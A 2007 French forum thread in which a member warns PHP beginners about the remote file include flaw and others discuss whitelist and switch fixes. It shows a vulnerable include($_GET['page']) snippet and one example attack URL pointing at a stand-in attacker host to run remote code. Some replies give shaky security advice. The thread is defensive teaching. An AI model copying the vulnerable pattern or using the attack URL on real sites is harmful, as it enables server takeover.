Netophonix - Le forum Index du Forum Netophonix - Le forum Index du Forum
 FAQFAQ   RechercherRechercher   Liste des MembresListe des Membres   Groupes d'utilisateursGroupes d'utilisateurs   S'enregistrerS'enregistrer 
 ProfilProfil   Se connecter pour vérifier ses messages privésSe connecter pour vérifier ses messages privés   ConnexionConnexion 
Règles et fonctionnementRègles et fonctionnement   Liste des sagas mp3Liste des sagas mp3

La Faille Include

 
Poster un nouveau sujet   Répondre au sujet    Netophonix - Le forum Index du Forum -> Informatique -> Site web : Astuces
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
D@rk Hell

Créateur
Créateur


H/F: H/F:Homme
Inscrit le: 28 Jan 2007
Messages: 22
Localisation: Un coin pomé
MessagePosté le: Sam 10 Fév 2007, 23:07    Sujet du message: La Faille Include Répondre en citant
C'est dernier temp j'ai vu des site en php (de saga mp3 ou pas) qui uttilisait la fonction "include" tant connu...

Mais pour bon nombre de webmaster, cette fonction est aussi associer a la faille "include".
C'est pour sa que j'ai créer ce topic, pour prévenir les débutant en php de ne pas tomber dans le piege qui pourait ravir les Hackers.

Exemple de faille include dans une page PHP:

Code:

$page = $_GET['page'];
include($page.".php");


Dans ce cas, le nom du fichier est récupérer puis le fichiet php est inclus et le script est exécuter par le serveur....

L'URL du site serait alors quelque chose comme:
    http://lesite.com/index.php?page=test

Le fichier test.php est donc inclus...

Mais imaginez qu'un internaute malveillant arrive sur votre site, et découvre que votre site comporte cette faille.... Il n'aurait plus qu'a ecrire ceci

    http://lesite.com/index.php?page=http://sonsite.com/hacking

Dans ce cas le script sur sont serveur est exécuter sur le votre....Il peut donc exécuter ce qu'il veut sur votre serveur.

voici un exemple de sécuriter que vous pouvez utiiser pour eviter cela:

Code:

$page = $_GET['page'];// On récupére le nom de la page

$securiter = array("test","test2"); //on fait un tableau des pages autoriser

for($i=0; ;$i++){  //On créer une boucle de vérification
if( $page == $securiter[$i])break;
if(empty($securiter[$i])) exit("Hacking stoppé"); }

include($page.".php"); //on inclus la page


Avec ça, on est certain que aucune autres pages viendrons perturber le bon fonctionnement de votre site internet
_________________
Fondateur de DukeTotchi....
Revenir en haut de page
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web de l'utilisateur
Canard Bigleux

Créateur
Créateur


H/F: H/F:Homme
Inscrit le: 17 Jan 2007
Messages: 83
MessagePosté le: Lun 12 Fév 2007, 16:47    Sujet du message: Répondre en citant
Merci de veiller à la sécurité de nos site webs ^^
_________________
Une ligue pas comme les autres sur http://lcj.ifrance.com
Revenir en haut de page
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web de l'utilisateur MSN Messenger
D@rk Hell

Créateur
Créateur


H/F: H/F:Homme
Inscrit le: 28 Jan 2007
Messages: 22
Localisation: Un coin pomé
MessagePosté le: Mar 27 Fév 2007, 21:49    Sujet du message: Répondre en citant
de rien...
_________________
Fondateur de DukeTotchi....
Revenir en haut de page
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web de l'utilisateur
Nishiki

Neto-Chroniqueur
Neto-Chroniqueur


H/F: H/F:Homme
Inscrit le: 15 Jan 2007
Age: 19
Messages: 505
Localisation: Zone 11
MessagePosté le: Sam 17 Mar 2007, 17:46    Sujet du message: Répondre en citant
Donc si j'ai bien compris tu entre tout les pages autorisé dans la bdd, et après tu vérifie la page demandé
_________________
Revenir en haut de page
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web de l'utilisateur MSN Messenger
Cekos

Postulant
Postulant


H/F: H/F:Homme
Inscrit le: 02 Avr 2007
Messages: 11
Localisation: Euhh ... chez moi ?
MessagePosté le: Mar 03 Avr 2007, 17:53    Sujet du message: Répondre en citant
Je suis pas d'accord avec toi, a mon avis un bon vieux switch est plus efficace dans ce genre

Code:
$page = $_GET['page']

switch $page
 case "index":
  include('forums.html');
  break;

 case "forum":
   include('forum.php');
   break;

Ect ...



Citation:
Donc si j'ai bien compris tu entre tout les pages autorisé dans la bdd, et après tu vérifie la page demandé

Non pas dans la bdd, mais dans un array
_________________
PHP : Programmation Hyper Puissante !! (Si Si !)

Dernière édition par Cekos le Lun 09 Avr 2007, 19:17; édité 1 fois
Revenir en haut de page
Voir le profil de l'utilisateur Envoyer un message privé
Nishiki

Neto-Chroniqueur
Neto-Chroniqueur


H/F: H/F:Homme
Inscrit le: 15 Jan 2007
Age: 19
Messages: 505
Localisation: Zone 11
MessagePosté le: Mar 03 Avr 2007, 18:03    Sujet du message: Répondre en citant
Et ben moi je met tout dans la BDD ^^
_________________
Revenir en haut de page
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web de l'utilisateur MSN Messenger
mike

Créateur
Créateur


H/F: H/F:Homme
Inscrit le: 21 Mai 2007
Messages: 73
Localisation: Liège - Belgique

A travaillé sur :
Le Collègebeuk mono-mp3-Soldat Ryan
MessagePosté le: Dim 10 Juin 2007, 10:23    Sujet du message: Répondre en citant
Si leur script s'appelle forum.php vous êtes mort quoi ^^
Moi j'utilise la méthode barbare du site du zero

<php>
_________________
Rejoignez les membres du forum sur irc à cette adresse pour discuter en direct!
/server irc.elykia.net
/join #netophonix
[img]http://d4.myfreefilehosting.com/d1/signature.jpg[img]
Revenir en haut de page
Voir le profil de l'utilisateur Envoyer un message privé MSN Messenger
Nishiki

Neto-Chroniqueur
Neto-Chroniqueur


H/F: H/F:Homme
Inscrit le: 15 Jan 2007
Age: 19
Messages: 505
Localisation: Zone 11
MessagePosté le: Dim 10 Juin 2007, 10:33    Sujet du message: Répondre en citant
Mort non car comment veux-tu qu'il est mit dans ton ftp le meme fichier que toi ?

Si il doivent appeler un fichier extérieur au site c'est sous la forme http://lalal.com/forum.php
Donc aucun risque
_________________
Revenir en haut de page
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web de l'utilisateur MSN Messenger
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Netophonix - Le forum Index du Forum -> Site web : Astuces Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  
Vous ne pouvez pas poster de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum




Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com